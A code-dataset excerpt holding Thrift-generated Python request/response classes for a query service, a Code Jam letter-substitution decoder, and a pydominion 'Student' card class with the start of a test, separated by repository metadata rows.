break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.catalogName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.schemaName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.functionName = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetFunctionsReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.catalogName is not None:
oprot.writeFieldBegin('catalogName', TType.STRING, 2)
oprot.writeString(self.catalogName)
oprot.writeFieldEnd()
if self.schemaName is not None:
oprot.writeFieldBegin('schemaName', TType.STRING, 3)
oprot.writeString(self.schemaName)
oprot.writeFieldEnd()
if self.functionName is not None:
oprot.writeFieldBegin('functionName', TType.STRING, 4)
oprot.writeString(self.functionName)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
if self.functionName is None:
raise TProtocol.TProtocolException(message='Required field functionName is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetFunctionsResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetFunctionsResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetOperationStatusReq(object):
"""
Attributes:
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
)
def __init__(self, operationHandle=None,):
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetOperationStatusReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetOperationStatusResp(object):
"""
Attributes:
- status
- operationState
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.I32, 'operationState', None, None, ), # 2
)
def __init__(self, status=None, operationState=None,):
self.status = status
self.operationState = operationState
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.operationState = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetOperationStatusResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationState is not None:
oprot.writeFieldBegin('operationState', TType.I32, 2)
oprot.writeI32(self.operationState)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCancelOperationReq(object):
"""
Attributes:
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
)
def __init__(self, operationHandle=None,):
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCancelOperationReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCancelOperationResp(object):
"""
Attributes:
- status
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
)
def __init__(self, status=None,):
self.status = status
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCancelOperationResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCloseOperationReq(object):
"""
Attributes:
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
)
def __init__(self, operationHandle=None,):
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCloseOperationReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCloseOperationResp(object):
"""
Attributes:
- status
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
)
def __init__(self, status=None,):
self.status = status
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCloseOperationResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetResultSetMetadataReq(object):
"""
Attributes:
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
)
def __init__(self, operationHandle=None,):
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetResultSetMetadataReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetResultSetMetadataResp(object):
"""
Attributes:
- status
- schema
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'schema', (TTableSchema, TTableSchema.thrift_spec), None, ), # 2
)
def __init__(self, status=None, schema=None,):
self.status = status
self.schema = schema
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.schema = TTableSchema()
self.schema.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetResultSetMetadataResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.schema is not None:
oprot.writeFieldBegin('schema', TType.STRUCT, 2)
self.schema.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TFetchResultsReq(object):
"""
Attributes:
- operationHandle
- orientation
- maxRows
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
(2, TType.I32, 'orientation', None, 0, ), # 2
(3, TType.I64, 'maxRows', None, None, ), # 3
)
def __init__(self, operationHandle=None, orientation=thrift_spec[2][4], maxRows=None,):
self.operationHandle = operationHandle
self.orientation = orientation
self.maxRows = maxRows
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.orientation = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.maxRows = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TFetchResultsReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
if self.orientation is not None:
oprot.writeFieldBegin('orientation', TType.I32, 2)
oprot.writeI32(self.orientation)
oprot.writeFieldEnd()
if self.maxRows is not None:
oprot.writeFieldBegin('maxRows', TType.I64, 3)
oprot.writeI64(self.maxRows)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
if self.orientation is None:
raise TProtocol.TProtocolException(message='Required field orientation is unset!')
if self.maxRows is None:
raise TProtocol.TProtocolException(message='Required field maxRows is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TFetchResultsResp(object):
"""
Attributes:
- status
- hasMoreRows
- results
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.BOOL, 'hasMoreRows', None, None, ), # 2
(3, TType.STRUCT, 'results', (TRowSet, TRowSet.thrift_spec), None, ), # 3
)
def __init__(self, status=None, hasMoreRows=None, results=None,):
self.status = status
self.hasMoreRows = hasMoreRows
self.results = results
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BOOL:
self.hasMoreRows = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.results = TRowSet()
self.results.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TFetchResultsResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.hasMoreRows is not None:
oprot.writeFieldBegin('hasMoreRows', TType.BOOL, 2)
oprot.writeBool(self.hasMoreRows)
oprot.writeFieldEnd()
if self.results is not None:
oprot.writeFieldBegin('results', TType.STRUCT, 3)
self.results.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetLogReq(object):
"""
Attributes:
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
)
def __init__(self, operationHandle=None,):
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetLogReq')
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationHandle is None:
raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetLogResp(object):
"""
Attributes:
- status
- log
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRING, 'log', None, None, ), # 2
)
def __init__(self, status=None, log=None,):
self.status = status
self.log = log
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.log = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetLogResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.log is not None:
oprot.writeFieldBegin('log', TType.STRING, 2)
oprot.writeString(self.log)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
if self.log is None:
raise TProtocol.TProtocolException(message='Required field log is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| [
"[email protected]"
] | |
59c65295bbf233c1466985d1aa33bafac20aa3fe | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_95/1152.py | a5a2f7fcec24d2ae43109115e3074698189fdd34 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,234 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from string import ascii_lowercase
from pprint import pprint
import sys, os
sample_googlerese = """ejp mysljylc kd kxveddknmc re jsicpdrysi
rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
de kr kd eoya kw aej tysr re ujdr lkgc jv
"""
sample_answer = """our language is impossible to understand
there are twenty six factorial possibilities
so it is okay if you want to just give up
"""
char_map = dict()
for c in ascii_lowercase:
char_map[c] = ""
char_map['q'] = 'z'
char_map[' '] = ' '
def make_char_mapping():
for a,g in zip(sample_answer, sample_googlerese):
if g in ascii_lowercase:
char_map[g] = a
for c in ascii_lowercase:
if not c in char_map.values():
char_map['z'] = c
def decode(input_str):
output = list()
for c in input_str:
if not c == '\n':
output.append(char_map[c])
return ''.join(output)
if __name__ == "__main__":
make_char_mapping()
filename = sys.argv[1]
template = "Case #%d: %s"
with open(filename) as r:
casenum = int(r.readline())
for i in xrange(casenum):
input_str = r.readline()
print template % (i + 1, decode(input_str))
| [
"[email protected]"
] | |
77dcd58897fa39cc6326e1fc2178a0adc30ff87b | cbdef2e8ed259adc4653ade34db12d8bcc0cea9f | /dominion/cards/Wizard_Student.py | fa8a42e3234ec5e594f4503326b3c3dd61788893 | [] | no_license | dwagon/pydominion | 8dd5afef8ec89c63ade74c4ae6c7473cd676799f | 545709f0a41529de74f33aa83b106c456900fa5b | refs/heads/main | 2023-08-29T10:02:26.652032 | 2023-08-23T02:25:00 | 2023-08-23T02:25:00 | 18,776,204 | 1 | 0 | null | 2023-08-23T02:25:02 | 2014-04-14T20:49:28 | Python | UTF-8 | Python | false | false | 3,568 | py | #!/usr/bin/env python
import unittest
from dominion import Game, Card, Piles
###############################################################################
class Card_Student(Card.Card):
def __init__(self):
Card.Card.__init__(self)
self.cardtype = [
Card.CardType.ACTION,
Card.CardType.WIZARD, # pylint: disable=no-member
Card.CardType.LIAISON,
]
self.base = Card.CardExpansion.ALLIES
self.cost = 3
self.name = "Student"
self.actions = 1
self.desc = """+1 Action;
You may rotate the Wizards;
Trash a card from your hand. If it's a Treasure, +1 Favor and put this onto your deck."""
def special(self, game, player):
opt = player.plr_choose_options(
"Do you want to rotate the Wizards?",
("Don't change", False),
("Rotate", True),
)
if opt:
game["Wizards"].rotate()
trashed = player.plr_trash_card(
prompt="Pick a card to trash", num=1, force=True
)
if trashed and trashed[0].isTreasure():
player.favors.add(1)
player.piles[Piles.PLAYED].remove(self)
player.add_card(self, "deck")
###############################################################################
class TestStudent(unittest.TestCase):
def setUp(self):
self.g = Game.TestGame(numplayers=1, initcards=["Wizards"], use_liaisons=True)
self.g.start_game()
self.plr = self.g.player_list()[0]
def test_play_trash_treas(self):
"""Play a student - don't rotate, but trash treasure"""
while True:
card = self.g["Wizards"].remove()
if card.name == "Student":
break
self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
self.plr.add_card(card, Piles.HAND)
